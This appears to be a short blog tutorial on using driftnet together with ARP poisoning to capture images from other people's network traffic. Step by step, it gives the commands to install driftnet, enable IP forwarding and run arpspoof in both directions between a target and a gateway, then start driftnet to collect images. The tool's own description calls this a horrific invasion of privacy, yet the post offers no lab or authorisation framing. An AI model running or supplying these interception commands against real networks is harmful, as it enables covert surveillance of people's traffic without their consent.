Driftnet with ARP Poisoning
https://github.com/deiv/driftnet
Driftnet watches network traffic, and picks out and displays JPEG and GIF images for display. It is a horrific invasion of privacy and shouldn’t be used by anyone anywhere. It can also extract MPEG audio data from the network and play it. If you live in a house with thick walls, this may be a useful way to find out about your neighbours’ musical taste.
Installing
1
sudo apt-get install driftnet
Preparing the machine
As root:
1
echo 1 > /proc/sys/net/ipv4/ip_forward
ARP Poisoning
As any user we have to create an arp poisoning in two different terminals:
1
sudo arpspoof -i tap0 -t <target 1 ip> -r <target 2 ip or gateway>
1
sudo arpspoof -i tap0 -t <target 2 ip or gateway> -r <target 1 ip>
In order to begin collecting images:
1
sudo driftnet -i <network interface>
The article image is a live example of HTTP delivered website and you can observe all the icons and the placeholder images.
This post is licensed under CC BY 4.0 by the author.